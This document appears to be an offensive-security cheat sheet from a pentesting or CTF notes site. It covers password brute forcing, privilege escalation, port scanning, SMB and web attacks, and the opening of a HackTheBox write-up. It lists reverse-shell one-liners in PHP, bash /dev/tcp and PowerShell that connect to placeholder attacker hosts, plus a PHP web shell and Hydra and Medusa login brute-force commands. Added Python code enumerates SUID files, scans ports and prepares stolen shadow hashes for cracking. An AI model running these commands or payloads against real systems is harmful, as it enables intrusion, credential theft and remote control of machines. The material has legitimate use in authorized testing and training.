BruteForcing

Table of Contents: JohnTheRipper, Medusa, Online Resources, Hydra, Parator

JohnTheRipper
    zip2john <zipfile> > <outputfile>
    john <hashfile> --fork=4 --wordlist=<wordlist>

Medusa
    # brute-forcing an SSH login with a username list and a password list
    medusa -h <host-ip> -U <user-file> -P <passwd-file> -M ssh

Online Resources
    Hash cracking: CrackStation

Hydra
    hydra -l <username> -P <pass-file> <domain> http-post-form "</login/path/>:<login-data>[username=^USER^&password=^PASS^]:<error-response>[Incorrect Username]"

Parator…

PrivilegeEscalation

Table of Contents: Linux, Find SetUID Files, Check User Privileges, Interactive Programs with SUDO Privilege, RottenPotato, Kernel 2.6, LXD/LXC Privilege Escalation, Priv Escalation Through Sudoers Conf, Exploit Suggester, Rational Love, VNC

Linux

Find SetUID Files
    find / -perm -4000 -type f 2>/dev/null

Check User Privileges
    sudo -l -l

Interactive Programs with SUDO Privilege
    sudo…
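The `find / -perm -4000` one-liner lists every SUID file, but on a real box the useful output is the short list of binaries that are not stock. The following is an added example, not code from the original cheat sheet: a Python equivalent of that `find` that also catches SGID (`-perm -2000`, or `-perm /6000` for either bit), skips `/proc`, `/sys` and `/dev`, and diffs the result against a baseline allow-list. The `STOCK_SUID` set is an assumed placeholder baseline; on an engagement you would generate it from a clean install of the same distribution release. The `demo()` fixture builds a throwaway directory with one SUID, one SGID and one plain file so the block runs offline as an unprivileged user (a user may set the set-id bits on files they own; the kernel only honours them at exec time).

```python
"""Enumerate SUID/SGID regular files under a root and flag those not in a baseline."""
import os
import stat
import tempfile

# Assumed placeholder baseline of stock set-id binaries (not from the cheat sheet).
STOCK_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su"}


def find_setid_files(root):
    """Return {path: mode_string} for regular files with SUID and/or SGID set under root.

    Mirrors `find <root> -perm /6000 -type f 2>/dev/null`: lstat() so symlinks are
    not followed, unreadable directories skipped instead of aborting.
    """
    hits = {}
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Do not descend into pseudo-filesystems; they are noise and can hang the walk.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits[path] = stat.filemode(st.st_mode)
    return hits


def unexpected_setid(hits, baseline=STOCK_SUID):
    """Set-id paths that are not in the known-good baseline: the ones worth a look."""
    return sorted(p for p in hits if p not in baseline)


def demo():
    """Constructed fixture: a temp tree with one SUID, one SGID and one plain file."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    suid = os.path.join(root, "backup-helper")
    sgid = os.path.join(root, "shared-tool")
    plain = os.path.join(root, "readme.txt")
    for p in (suid, sgid, plain):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(suid, 0o4755)    # -rwsr-xr-x
    os.chmod(sgid, 0o2755)    # -rwxr-sr-x
    os.chmod(plain, 0o644)    # -rw-r--r--
    hits = find_setid_files(root)
    return {"root": root, "suid": suid, "sgid": sgid, "plain": plain,
            "hits": hits, "unexpected": unexpected_setid(hits)}


if __name__ == "__main__":
    result = demo()
    for path, mode in sorted(result["hits"].items()):
        print(mode, path)
    print("not in baseline:", result["unexpected"])
```

To use it on a target, call `find_setid_files("/")` and hand the result to `unexpected_setid()` with a baseline captured from a clean reference host; everything it prints is a candidate for the GTFOBins-style checks the rest of this page covers.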

ReverseShell

Table of Contents: PHP Reverse Shell, Bash, NetCat, Net Cat Cheat Sheet, Bat File

PHP Reverse Shell
    php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
    php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
    /usr/share/webshells/php/php-reverse-shell.php
    # command execution via a request parameter
    <?php system($_REQUEST['mycmd']); ?>

Bash
    bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'

NetCat
    nc <host> <port>
    If in a meterpreter shell: execute -f…

DirectoryFuzzing

Table of Contents: Dirbuster, Gobuster, Dirsearch, Wfuzz, Other Useful Tools

Dirbuster
    dirbuster -v -u <URL> -e <extensions> -l <wordlist> -r <report-location>

Gobuster
    gobuster dir -u <URL> -v -t <threads> -w <wordlist>
    gobuster dns -d <domain> -v -t <threads> -w <wordlist>

Dirsearch
    dirsearch.py -u <URL> -e <extensions> -t <threads> -c <cookies> --proxy=<proxy>

Wfuzz
    wfuzz -c -v --hc <status-code> -w <wordlist> <URL>/FUZZ

Other Useful Tools
    Tons…

PortScan

Table of Contents: Nmap, Masscan, Unicorn Scan

Nmap
    nmap -A -T4 -p- -v -oN nmap.txt <host>

Masscan
    masscan -p 1-65535 <host> -e <interface> --rate=<rate>

Unicorn Scan
    us -mT -Iv <host>:<ports[a|]> -r <rate[3000|]> -R <round[3|]>
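All three scanners above hide the same basic mechanics behind their flags: a probe per port, a timeout, and three outcomes to tell apart (a completed connect is open, an RST is closed, silence is filtered by something dropping the packet), with speed coming from parallelism. The following is an added example, not part of the original cheat sheet: a threaded TCP connect scan in Python that classifies ports that way. The `demo()` fixture is constructed for this example: it stands up a throwaway listener on 127.0.0.1 and releases a second ephemeral port so there is one known-open and one known-closed target, letting the block run offline with no real host involved.

```python
"""Threaded TCP connect scan with open / closed / filtered classification."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """Classify one port as 'open', 'closed' or 'filtered' via a full connect()."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"                 # three-way handshake completed
        except ConnectionRefusedError:
            return "closed"               # RST came back: host up, nothing listening
        except (socket.timeout, TimeoutError):
            return "filtered"             # no answer at all: SYN most likely dropped
        except OSError:
            return "filtered"             # unreachable etc.: treat conservatively


def connect_scan(host, ports, workers=64, timeout=1.0):
    """Return {port: state} for every port in `ports`, probing in parallel."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, states))


def open_ports(results):
    """Sorted list of the ports reported open."""
    return sorted(p for p, state in results.items() if state == "open")


def demo():
    """Constructed fixture: one listening loopback port, one known-closed one."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))       # port 0: let the kernel pick a free one
    listener.listen(8)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                         # nothing listens here now: connect() gets RST

    def accept_loop():                    # drain connects so the scan completes cleanly
        while True:
            try:
                conn, _ = listener.accept()
                conn.close()
            except OSError:
                return                    # listener closed: stop

    threading.Thread(target=accept_loop, daemon=True).start()
    try:
        results = connect_scan("127.0.0.1", {open_port, closed_port})
    finally:
        listener.close()
    return {"open_port": open_port, "closed_port": closed_port, "results": results}


if __name__ == "__main__":
    r = demo()
    for port, state in sorted(r["results"].items()):
        print(port, state)
    print("open:", open_ports(r["results"]))
```

Against a real host, `connect_scan(host, range(1, 65536))` is the equivalent of `-p-`; raising `workers` is the knob masscan's `--rate` turns, and a burst of "filtered" results where you expected "closed" is the usual sign of a firewall dropping rather than rejecting.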

Powershell

Table of Contents: Reverse Shell One-liner, PowerSploit, Invoke-Shellcode, Invoke-WmiMethod, Get-Keystrokes, Exfiltration/Out-Minidump.ps1, Exfiltration/Get-TimedScreenshot.ps1, Nishang, Get-Information.ps1, Get-WLAN-Keys.ps1, StartListener.py, Ps_encoder.py, Get System Release ID, Executing Command as Another User, Get User ACL, Go into Registry Mode

Reverse Shell One-liner
    $client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName…

JuicyFiles

Table of Contents: Linux, Password Hash Files, History, Configuration Files, Windows, Configuration Files, Hash Files, Windows System Info

Linux

Password Hash Files
    passwd, shadow
    Content – user password hashes
    Features – crypt(3) hashes; SHA-512crypt ($6$) on most current distributions, SHA-256crypt ($5$) on some
    Location – /etc
    Handle – unshadow <passfile> <shadowfile>, then hashcat or john

History
    bash_history
    Content – bash history
    Features – may contain…
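The "unshadow, then hashcat or john" step is worth doing with a little care: `unshadow` only swaps the `x` placeholder in field 2 of passwd for the hash in shadow, and the resulting file will usually contain locked and passwordless accounts plus a mix of crypt(3) schemes that need different hashcat modes. The following is an added example, not code from the original cheat sheet: a Python reimplementation of the merge, a classifier that reads the `$id$` prefix to pick the scheme and hashcat `-m` mode, and a filter that keeps only entries worth cracking. The sample passwd and shadow contents are constructed for this example and the hash bodies are placeholders, not real digests; the mode numbers are hashcat's (500 md5crypt, 1500 descrypt, 1800 sha512crypt, 3200 bcrypt, 7400 sha256crypt; yescrypt is handled by john but has no hashcat mode).

```python
"""Merge passwd and shadow like unshadow(8), classify hashes, plan the crack job."""

# crypt(3) scheme by $id$ prefix -> (name, hashcat -m mode); None = not in hashcat.
SCHEMES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$y$": ("yescrypt", None),
}

# Constructed sample files for this example; hash bodies are placeholders.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice Example,,,:/home/alice:/bin/bash
legacy:x:1001:1001::/home/legacy:/bin/sh
olduser:x:1002:1002::/home/olduser:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERSHA512CRYPTHASH:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
alice:$1$abcdefgh$PLACEHOLDERMD5:18000:0:99999:7:::
legacy:!$6$saltsalt$PLACEHOLDERLOCKED:18000:0:99999:7:::
olduser:abPLACEHOLD13:18000:0:99999:7:::
"""


def classify_hash(field):
    """Return (scheme, hashcat_mode); locked/empty/unknown entries get mode None.

    A leading '!' is an account locked with `passwd -l` (the old hash is kept after
    the '!'), '*' or '!!' means no password was ever set, and an empty field means
    the account logs in with no password at all.
    """
    if field == "":
        return ("empty", None)
    if field == "*" or field.startswith("!"):
        return ("locked", None)
    for prefix, info in SCHEMES.items():
        if field.startswith(prefix):
            return info
    if len(field) == 13 and "$" not in field:
        return ("descrypt", 1500)     # legacy DES crypt: 8-char limit, trivially cracked
    return ("unknown", None)


def unshadow(passwd_text, shadow_text):
    """Return passwd lines with field 2 replaced by the shadow hash, like unshadow(8)."""
    shadow = {}
    for line in shadow_text.splitlines():
        if line.strip() and not line.startswith("#"):
            user, hash_field = line.split(":")[:2]
            shadow[user] = hash_field
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue                      # not a well-formed passwd(5) entry
        fields[1] = shadow.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crack_plan(merged_lines):
    """[(user, scheme, hashcat_mode)] for the entries worth feeding to a cracker."""
    plan = []
    for line in merged_lines:
        user, hash_field = line.split(":")[:2]
        scheme, mode = classify_hash(hash_field)
        if scheme in ("locked", "empty", "unknown"):
            continue
        plan.append((user, scheme, mode))
    return plan


if __name__ == "__main__":
    for entry in crack_plan(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)):
        print(entry)
```

Group the output by mode before running hashcat, since one invocation handles one hash type; an "empty" entry on a real host is a finding in itself (login with no password) and needs no cracking.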

Services

Table of Contents: Samba, Enumeration, Smbclient, Crackmapexec, Psexec_command or Usermap_script Msf, Foothold, MS_17_010, Psexec.py, Psexec Msf, Smb_login Msf, DistCC, Foothold, CVE-2004-2687

Samba

Enumeration

Smbclient
    # list all shares
    smbclient -L \\\\<host>\\

Crackmapexec
    # list all shares
    crackmapexec smb <ip> -u <username> -p <password> --shares

Psexec_command or Usermap_script Msf
    # execute an SMB command
    auxiliary/admin/smb/psexec_command
    set COMMAND [command you want…

WebApplication

Table of Contents: General Check List, Initial Steps With Unprivileged User Account, OWASP’s Guide, HeartBleed, Enumeration, BurpSuite, Dirbuster, Gobuster, Dirsearch, Wfuzz, PHP Info Page, PHP Filter, PHP Remote File Inclusion, PHP Log Poisoning, Wpscan, Other Tools, Foothold, Identity Brute Forcing, SQL Injection – URL, SQL Injection – Web Form, Directory Traversal, XXE Injection, Type Juggling…

0x0B-HackTheBox-Obscurity

Set up

The target machine is at 10.10.10.168.

Recon

Nmap
    # Nmap 7.80 scan initiated Tue Apr 28 03:28:16 2020 as: nmap -A -T4 -p- -v -oN nmap.txt 10.10.10.168
    adjust_timeouts2: packet supposedly had rtt of -935420 microseconds. Ignoring time.
    adjust_timeouts2: packet supposedly had rtt of -935420 microseconds. Ignoring time.
    adjust_timeouts2: packet supposedly had rtt of -1170053 microseconds. Ignoring time.…